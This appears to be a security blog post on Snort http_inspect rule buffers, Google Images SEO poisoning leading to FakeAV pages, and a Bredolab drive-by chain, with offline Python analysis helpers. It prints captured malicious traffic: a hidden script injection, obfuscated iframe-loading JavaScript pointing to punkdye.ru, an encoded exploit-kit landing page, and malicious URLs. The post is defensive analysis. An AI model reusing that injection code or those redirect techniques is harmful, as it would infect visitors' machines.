This is because we are not specifying a buffer to search in the content match, even though http_inspect is creating the buffers.
Please note, from here on out, the accuracy of what is being written may become slightly off but it is what we have observed when testing!
If you look at the coloring of the example packet in the original post, the HTTP response from the server is separated into three colors: the http_cookie buffer in green, the http_header buffer in red, and the rest of the packet, which is not put into any specific buffer, in grey. So the most recent signature we discussed only checks for the string "bmb=12" in the grey portion of the packet, and of course that does not alert. Looking for "bmb=12" inside http_header also does not work. However, looking for "Set-Cookie: bmb=12" inside http_header DOES work. Why? I honestly have no clue. Looking for "bmb=12" inside http_cookie matches, which is what we expect.
We alerted Sourcefire to this discrepancy, and the word we received back is that everyone should be using the VRT (right) version of the http_inspect configuration, and that the config included with the source code not being updated was an oversight. It appears to have been fixed, as the current release candidate of Snort (2.9.0-RC) ships with the updated VRT (right) version of the http_inspect configuration. So if you have custom signatures, or run signatures from other groups, that look for things like user-agent strings or server versions inside http_header, cookie values inside http_cookie, etc., you really need to update them if you want to use this much more efficient configuration. It is going to be a bit of a nightmare for people who have been writing signatures against the old style http_inspect configuration.
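As an added illustration (a simplified model written for this post, not Snort's code), the following Python builds a response like the one above and shows what the two VRT options change: with enable_cookie the Set-Cookie value lands in a cookie buffer that an http_cookie rule can search, and with inspect_gzip a gzip-encoded body is decompressed before a body content match runs. It follows the documented behaviour that the cookie buffer holds the value without the header name and that, without enable_cookie, the cookie line simply stays in the header buffer; the post's own observations about unmodified and http_header matches are not reproduced. The response is constructed, with the date and expiry values made up.

```python
import gzip

RAW_BODY = b"<html><body>this is the body</body></html>"
COOKIE_LINE = b"Set-Cookie: bmb=1279227526; expires=Thu, 01-Jan-2099 00:00:00 GMT; path=/; domain=ssladdon.in"


def build_response(gzipped: bool) -> bytes:
    """Constructed server response modelled on the nginx/PHP one in the post."""
    body = gzip.compress(RAW_BODY) if gzipped else RAW_BODY
    lines = [b"HTTP/1.1 200 OK", b"Server: nginx/0.6.39", b"Content-Type: text/html",
             b"X-Powered-By: PHP/5.1.6", COOKIE_LINE]
    if gzipped:
        lines.append(b"Content-Encoding: gzip")
    lines.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def split_buffers(response: bytes, enable_cookie: bool, inspect_gzip: bool) -> dict:
    """Model of how the two http_inspect options decide what the rule buffers contain."""
    head, _, body = response.partition(b"\r\n\r\n")
    header_lines = head.split(b"\r\n")[1:]          # drop the status line
    cookie, kept, encoding = b"", [], b""
    for line in header_lines:
        name, _, value = line.partition(b":")
        lname, value = name.strip().lower(), value.strip()
        if lname == b"content-encoding":
            encoding = value.lower()
        if enable_cookie and lname in (b"cookie", b"set-cookie"):
            cookie = value                          # value only: no header name, no CRLF
            continue                                # extracted out of the header buffer
        kept.append(line)
    if inspect_gzip and encoding == b"gzip" and body:
        body = gzip.decompress(body)                # only decompressed when inspect_gzip is on
    return {"header": b"\r\n".join(kept), "cookie": cookie, "body": body}


def content_match(buffers: dict, pattern: bytes, buffer: str) -> bool:
    """The equivalent of content:"pattern"; http_<buffer>; evaluated against one buffer."""
    return pattern in buffers[buffer]


if __name__ == "__main__":
    for enable_cookie, inspect_gzip in ((False, False), (True, True)):
        buffers = split_buffers(build_response(True), enable_cookie, inspect_gzip)
        print(enable_cookie, inspect_gzip,
              content_match(buffers, b"bmb=12", "cookie"),
              content_match(buffers, b"this is the body", "body"))
```

The same packet therefore matches or misses depending only on which snort.conf the sensor loaded, which is exactly why rules written against one configuration silently stop working on the other.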
We have seen several pages created on extremely cheap registrar/hosting services (co.cc and cz.cc primarily) that carry an image of some specific subject surrounded by lots of related text in order to push the page up the Google Images rankings. This in itself is nothing new (people have been doing it since the dawn of search engines to drive hits), but the fact that a user can keep their browser on www.google.com and still load content from a malicious FakeAV or drive-by kit is a bit of a game changer. It gives malicious people a very easy avenue to drive hits to their exploit kits without compromising massive numbers of WordPress blogs, running or defrauding advertising networks, or producing tons of email spam. Below we go over one example identified in the wild.
The URL we stumbled upon during research was as follows, yes this is real and live:
http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
If we review the contents of this URL, we notice that we have some different components to it:
www.google.com/imgres?imgurl= - Just good old Google Images
http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg - Location of an image file on the Internet. Nothing special about this either.
http://dzr4n.com/_vti_tmp/john-drake.html - Redirects users to a FakeAV scanner page if and only if you have a referrer from Google Images.
Now if we load this URL, this is what it looks like in Firefox with NoScript and Firebug running for a bit of analysis:
[Screenshot: the Google Images result page loaded in Firefox with NoScript and Firebug]
You notice the user is just using Google Image search, but www.google.com is now loading the content of that site inside an IFRAME, shown in the code snippet below:
<div id=il_fc><iframe src="http://dzr4n.com/_vti_tmp/john-drake.html" id=il_f frameborder=0 scrolling="no"></iframe>
Now, when we request that page with the following Referer, the malicious server gives the client a redirect to the FakeAV site. If you go there directly, you instead see a garbage blog page with the picture (and several others from other sites) along with lots of tags and keywords related to various people named John Drake. Below are the request generated by loading the above IFRAME and the 302 redirect it returns:
GET /_vti_tmp/john-drake.html HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dzr4n.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Fri, 03 Sep 2010 22:34:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Location: http://dwedwedwed.co.cc/?777
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
You notice that it redirects to a domain we have not seen before in this discussion, dwedwedwed.co.cc/?777. There are some intermediary servers that eventually land the Google Images user on the FakeAV site at froltartemo.cz.cc; here are the steps taken to get there:
GET /?777 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc
HTTP/1.1 302 Found
Date: Fri, 03 Sep 2010 22:38:10 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Fri, 03 Sep 2010 22:38:10 GMT
Cache-Control: max-age=0
Pragma: no-cache
Set-Cookie: sid=1S2; expires=Sun, 05-Sep-2010 00:33:45 GMT; path=/
LOCATION: http://dwedwedwed.co.cc/t/bak.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html; charset=utf-8
....................
which causes the next request and response:
GET /t/bak.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.com/imgres?imgurl=http://daytoncreate.org/wp-content/uploads/2009/09/JohnDrake2.jpg&imgrefurl=http://dzr4n.com/_vti_tmp/john-drake.html&usg=__M4-04y3qiUsdvd8zXWOk_G2K1qc=&h=370&w=441&sz=158&hl=en&start=8&zoom=1&um=1&itbs=1&tbnid=ut-iq_wdKMHNqM:&tbnh=107&tbnw=127&prev=/images%3Fq%3DJohn%2BLindly%26um%3D1%26hl%3Den%26safe%3Dactive%26sa%3DN%26rlz%3D1T4GGLD_enUS306US306%26tbs%3Disch:1
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: dwedwedwed.co.cc
HTTP/1.1 200 OK
Date: Fri, 03 Sep 2010 22:38:11 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 243
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<script language="JavaScript" type="text/javascript">
if (top.location != self.location) top.location = self.location;
</script>
<body>
<script>window.location="http://froltartemo.cz.cc/scanner15/?afid=60";</script>
</body>
</html>
Above we can see a page that presents itself as a 404 Not Found (the server actually returned 200 OK), breaks out of any enclosing frame, and then sends the client on to the FakeAV page with a script redirect. When that page loads, the browser window is resized and hidden behind a prompt box in an attempt to trick the user into downloading and executing a binary:
[Screenshot: the FakeAV scanner page with its download prompt]
From there on out it is somewhat up to how good your antivirus solution is at detecting this stuff and the user's willingness to run executables they think they just downloaded from Google.
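As an added example (not part of the original post), the following Python walks a chain like the one above offline: it parses each raw response, treats header names case-insensitively (the second hop used LOCATION: in capitals), gunzips bodies served with Content-Encoding: gzip, falls back to a window.location style script redirect when there is no 3xx, and flags hops on the cheap co.cc / cz.cc domains the post mentions. The responses are constructed from the exchanges shown above, abbreviated, with no network access; the direct-visit decoy page is invented.

```python
import gzip
import re
from urllib.parse import urlsplit

JS_REDIRECT = re.compile(
    rb"""(?:window|document|top|self|parent)\.location(?:\.href)?\s*=\s*["']([^"']+)["']""")
CHEAP_SUFFIXES = (".co.cc", ".cz.cc")   # the cheap registrar/hosting domains the post names


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status code, {lowercased name: value}, decoded body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    if headers.get("content-encoding", "").lower() == "gzip" and body:
        body = gzip.decompress(body)          # the script redirect above was served gzipped
    return status, headers, body


def next_hop(raw: bytes):
    """('http', url) for a 3xx with Location, ('js', url) for a script redirect, else None."""
    status, headers, body = parse_response(raw)
    if 300 <= status < 400 and "location" in headers:   # "Location:" and "LOCATION:" alike
        return "http", headers["location"]
    m = JS_REDIRECT.search(body)
    if m:
        return "js", m.group(1).decode("latin-1")
    return None


def follow_chain(start_url: str, responses: dict, max_hops: int = 10) -> list:
    """Walk the redirect chain offline using a url -> raw response table; returns URLs visited."""
    chain, url = [start_url], start_url
    for _ in range(max_hops):
        hop = next_hop(responses[url]) if url in responses else None
        if hop is None:
            break
        url = hop[1]
        chain.append(url)
    return chain


def cheap_hosted(chain: list) -> list:
    """Hostnames in the chain that sit under one of the cheap registrar domains."""
    hosts = {urlsplit(u).hostname for u in chain if urlsplit(u).hostname}
    return sorted(h for h in hosts if h.endswith(CHEAP_SUFFIXES))


# Constructed responses, abbreviated from the exchanges shown above (no network access).
BAK_HTML = (b'<html><head><title>404 Not Found</title></head>\n'
            b'<script>if (top.location != self.location) top.location = self.location;</script>\n'
            b'<body><script>window.location="http://froltartemo.cz.cc/scanner15/?afid=60";</script></body></html>')
RESPONSES = {
    "http://dzr4n.com/_vti_tmp/john-drake.html":
        b"HTTP/1.1 302 Moved Temporarily\r\nServer: Apache/2.2.15 (Unix)\r\n"
        b"Location: http://dwedwedwed.co.cc/?777\r\nContent-Length: 0\r\n\r\n",
    "http://dwedwedwed.co.cc/?777":
        b"HTTP/1.1 302 Found\r\nSet-Cookie: sid=1S2; path=/\r\n"
        b"LOCATION: http://dwedwedwed.co.cc/t/bak.php\r\nContent-Length: 0\r\n\r\n",
    "http://dwedwedwed.co.cc/t/bak.php":
        b"HTTP/1.1 200 OK\r\nContent-Encoding: gzip\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
        + gzip.compress(BAK_HTML),
}
# Invented decoy: what a direct visit without the Google Images referer returns (no redirect).
DECOY = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
         b"<html><body><h1>John Drake</h1><img src=\"JohnDrake2.jpg\"></body></html>")

if __name__ == "__main__":
    chain = follow_chain("http://dzr4n.com/_vti_tmp/john-drake.html", RESPONSES)
    print(" -> ".join(chain))
    print("cheap hosting:", cheap_hosted(chain))
```

When replaying a real capture, keep the original Referer on every request: the first hop only redirects when it sees the Google Images referer, so a replay without it returns the decoy page and the chain appears to stop after one hop.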
The Bredolab infections we commonly see use compromised websites to redirect clients who are visiting legitimate sites, in contrast to the SEO exploit sites that rely almost exclusively on malvertising to drive people to them. The number of people driven to the Bredolab boxes is not nearly as high as you might imagine, and they are not any more difficult to track. Below we go step by step through a client visiting a website until it became infected. Here is the first request we take note of: the user searched for a term in Google and clicked on a result hosted on www.iwatchdocumentaries.com:
GET /documenatries/louis-theroux-americas-medicated-kids-2010/ HTTP/1.1
Accept: */*
Referer: http://www.google.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.iwatchdocumentaries.com
Connection: Keep-Alive
Now the response to this request is quite lengthy, so we trim it down and focus on a JavaScript file loaded from a streaming media provider's site:
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 28978
Content-Type: text/html
Date: Fri, 13 Aug 2010 <OMITTED>
Keep-Alive: timeout=15, max=1000
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Set-Cookie: vid_count_<OMITTED>=<OMITTED>; expires=Sat, 13-Aug-2011 <OMITTED>
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch "Louis Theroux: America's Medicated Kids" (2010) Free - Watch Documentaries Online</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Watch Louis Theroux: America's Medicated Kids 2010 Online for free. Louis Theroux: America's Medicated Kids Summary: Faced with the challenging behaviour of their kids more and more parents in America are turning to psychoactive medication to help them cope even though the drugs and sometimes the diagnoses remain controversial. Louis travels to one of Americas leading childrens psychiatric treatment centres in Pit..." />
<meta name="keywords" content="Watch Louis Theroux: America's Medicated Kids Online, Watch Louis Theroux: America's Medicated Kids 2010, Watch Documentaries Free, Watch Documentaries Online" />
<link rel="icon" type="image/x-icon" href="http://deliver.theiwatchnetwork.com/5/images-css/browser.ico" />
<link rel="stylesheet" type="text/css" href="http://deliver.theiwatchnetwork.com/5/iwatch_06.css" media="screen" />
<script type="text/javascript" src="http://deliver.theiwatchnetwork.com/5/iwatch_05.js"></script>
<script type="text/javascript">
window.onload=function(){ update_link_ratings() }
function update_link_ratings() {
document.getElementById('s201366494').innerHTML = '<font color="#009900">100%</font>';
}
</script>
---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
</body>
</html>
What is going to cause the client to end up requesting the drive-by is the content of the http://deliver.theiwatchnetwork.com/5/iwatch_05.js JavaScript file. When the client requests it, the very end of that JavaScript contains this:
HTTP/1.1 200 OK
Cache-Control: max-age=6048000
Connection: keep-alive
Content-Length: 156825
Content-Type: application/x-javascript
Date: Fri, 13 Aug 2010 <REMOVED>
ETag: <REMOVED>
Expires: Fri, 22 Oct 2010 <REMOVED>
Last-Modified: Thu, 12 Aug 2010 <REMOVED>
Server: CacheFlyServe v26b
X-CF1: fC.ord1:hf
---TONS OF STUFF OMITTED FOR THE SAKE OF BREVITY---
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Facebook.js"></scri'+'pt>');
This of course causes the client to request http://pocketbloke.ru/Facebook.js. Here is the server's response to that request, in its entirety:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/javascript
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 1256
try{
var U3uj00dp58;
function Xgdvqin(){
if (typeof(document.body) == 'object'){
clearInterval(U3uj00dp58);
}else{
return true;
}
Ek09wc1guj = '';
Rlg92ocpa = ['src','h>e>ingnh>tv'.replace(/[vn,4\>]/g, ''), 'wzi#dpt#hM'.replace(/[M#z\!p]/g, '')];
function Gp3paj1lm(Eta8efwl037,Vmmu4gc2m,Imzsoblt938q4f){
return Eta8efwl037.setAttribute(Vmmu4gc2m,Imzsoblt938q4f);
}
function Yjcsup30i4t(Idfrg0lo9s){
return document.createElement(Idfrg0lo9s);
}
Elakx6em19 = 'p';
Xf2wek912 = window.frames.length;
if (Xf2wek912<20) Elakx6em19 = 'i5f4r5anm4e<'.replace(/[\<5\]4n]/g, '');
Egi14av = 'US';
Vt5pcf3zu80 = '2679997376';
Oskptba3 = 'http://punkdye.ru:8080/index.php?pid=1&Cxuuxx0tgpkezo09='+Xf2wek912;
Nnkuah4e4bj4 = 1060243405;
Ki6v57vs = Yjcsup30i4t('div');
Ki6v57vs.id = 'Ai6lruxkgj';
Ki6v57vs.name = 'Ai6lruxkgj';
Nnkuah4e4bj4 -= 530121702.5*2;
document.body.appendChild(Ki6v57vs);
H9cgm6y3fl = 'Nnkuah4e4bj4';
L2h514hotu = new Array(Oskptba3, Nnkuah4e4bj4,Nnkuah4e4bj4);
Cgnjln5alh = document.createElement(Elakx6em19);
for (Eizoi0xp in Rlg92ocpa){
Gp3paj1lm(Cgnjln5alh,Rlg92ocpa[Eizoi0xp], L2h514hotu[Eizoi0xp]);
}
document.getElementById('Ai6lruxkgj').appendChild(Cgnjln5alh);
}
U3uj00dp58 = window.setInterval(Xgdvqin, '300');
}catch(Ekdyic4zi9u){}
We could deobfuscate this, but we don't really have to: it is pretty obvious that this piece of JavaScript is going to send the client to punkdye.ru on port 8080 through an iframe, and that seems more than a little suspicious. And of course, the client then makes this request next:
GET /index.php?pid=1&Cxuuxx0tgpkezo09=0 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.iwatchdocumentaries.com/documenatries/louis-theroux-americas-medicated-kids-2010/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: punkdye.ru:8080
Connection: Keep-Alive
That gives us this response from the server: obfuscated data and JavaScript that make up the landing page of this type of drive-by kit (whose name I am unsure of). This response can be signatured with great accuracy based on the hidden-visibility div tag:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Aug 2010 <REMOVED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Set-Cookie: pid=1; expires=Fri, 13-Aug-2010 <REMOVED>
e95
<html>
<head><title>Xrgea3q5co5j0</title></head><body>
<div style="visibility: hidden;"><div name="Maz84dbeq" id="Maz84dbeq">102Q99Q37Q37Q97Q108Q96Q114Q106Q98Q107Q113Q43Q94Q105Q105Q38Q35Q35Q37Q107Q94Q115Q102Q100Q94Q113Q108Q111Q43Q94Q109Q109Q83Q98Q111Q112Q102Q108Q107Q43Q102Q107Q97Q98Q117Q76Q99Q37Q36Q74Q80Q70Q66Q29Q52Q43Q36Q38Q30Q58Q42Q46Q38Q38Q29Q97Q108Q96Q114Q106Q98Q107Q113Q43Q116Q111Q102Q113Q98Q37Q31Q57Q102Q99Q111Q94Q106Q98Q29Q112Q111Q96Q58Q89Q31Q101Q96Q109Q55Q44Q44Q112Q98Q111Q115Q102Q96Q98Q112Q44Q112Q98Q94Q111Q96Q101Q60Q110Q114Q98Q111Q118Q58Q35Q113Q108Q109Q102Q96Q58Q101Q96Q109Q55Q44Q44Q112Q118Q112Q113Q98Q106Q44Q112Q118Q112Q102Q107Q99Q108Q44Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q</div>
<div name="K69m8203" id="K69m8203">34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q34Q34Q62Q43Q43Q34Q50Q64Q43Q43Q34Q50Q64Q112Q118Q112Q102Q107Q99Q108Q106Q94Q102Q107Q43Q101Q113Q106Q34Q114Q45Q45Q48Q99Q112Q115Q111Q58Q34Q48Q64Q112Q96Q111Q102Q109Q113Q40Q97Q98Q99Q98Q111Q34Q48Q66Q98Q115Q94Q105Q34Q47Q53Q114Q107Q98Q112Q96Q94Q109Q98Q34Q47Q53Q34Q47Q52Q107Q98Q116Q34Q47Q63Q62Q96Q113Q102Q115Q98Q85Q76Q95Q103Q98Q96Q113Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q116Q112Q96Q111Q102Q109Q113Q43Q112Q101Q98Q105Q105Q34Q47Q50Q47Q47Q34Q47Q50Q47Q54Q43Q79Q114Q107Q34Q47Q50Q47Q53Q34Q47Q50Q47Q47Q96Q106Q97Q34Q47Q63Q34Q47Q50Q47Q67Q96Q34Q47Q63Q96Q97Q34Q47Q63Q43Q43Q34Q47Q50Q47Q67Q34Q47Q50Q47Q51Q98Q96Q101Q108Q34Q47Q63Q99</div>
<div name="Wq67wbxt8" id="Wq67wbxt8">Q114Q107Q96Q113Q102Q108Q107Q34Q47Q63Q94Q54Q34Q47Q50Q47Q53Q95Q51Q34Q47Q50Q47Q54Q34Q47Q50Q52Q63Q111Q83Q92Q92Q34Q47Q50Q48Q63Q99Q108Q111Q34Q47Q50Q47Q53Q102Q83Q95Q51Q43Q105Q98Q107Q100Q113Q101Q34Q47Q50Q48Q63Q102Q34Q47Q50Q48Q66Q83Q45Q34Q47Q50Q48Q63Q102Q42Q42Q34Q47Q50Q47Q54Q111Q34Q47Q50Q47Q63Q83Q95Q51Q43Q96Q101Q94Q111Q62Q113Q34Q47Q50Q47Q53Q102Q34Q47Q50Q47Q54Q34Q47Q50Q48Q63Q111Q98Q113Q114Q111Q107Q34Q47Q63Q111Q34Q47Q50Q52Q65Q107Q98Q116Q34Q47Q63Q67Q114Q107Q96Q113Q102Q108Q107Q34Q47Q50Q47Q53Q94Q54Q34Q47Q50Q47Q53Q92Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q47Q34Q47Q50Q47Q64Q71Q98Q117Q98Q43Q113Q111Q94Q113Q112Q71Q34Q47Q50Q47Q53Q34Q47Q50Q50Q65Q71Q98Q105Q102Q71Q34Q47Q50Q410007Q63Q71Q67Q108Q81Q98Q115Q94Q80Q71Q34Q47Q50Q50Q63Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q50Q65Q71Q118Q97Q108Q63Q98Q112Q107Q108Q71Q34Q47Q50Q47Q63Q71Q109Q112Q98Q111Q71Q34Q47Q50Q50Q63Q117Q34Q47Q50Q47Q53Q98Q113Q102Q111Q84Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q34Q47Q50Q47Q53Q107Q98Q109Q76Q43Q108Q34Q47Q50Q48Q63Q46Q83Q98Q109Q118Q81Q43Q108Q34Q47Q50Q48Q63Q48Q83Q98Q97Q108Q74Q43Q108Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q105Q105Q114Q107Q34Q47Q50Q47Q53Q97Q107Q98Q112Q43Q117Q34Q47Q50Q48Q63Q34Q47Q50Q47Q54Q45Q34Q47Q50Q47Q64Q71Q46Q83Q97Q102Q109Q34Q47Q50Q47Q51Q46Q83Q97Q102Q34Q47Q50Q48Q67Q109Q101Q109Q43Q98Q106Q108Q96Q105Q98Q116Q34Q47Q50Q47Q67Q45Q53Q45Q53Q34Q47Q50Q48Q62Q114Q111Q43Q98Q118Q97Q104Q107Q114Q109Q34Q47Q50Q47Q67Q34Q47Q50Q47Q67Q34Q47Q50Q48Q62Q109Q113Q113Q101Q71Q34Q47Q50Q47Q64Q71Q81Q66Q68Q71Q3</div>
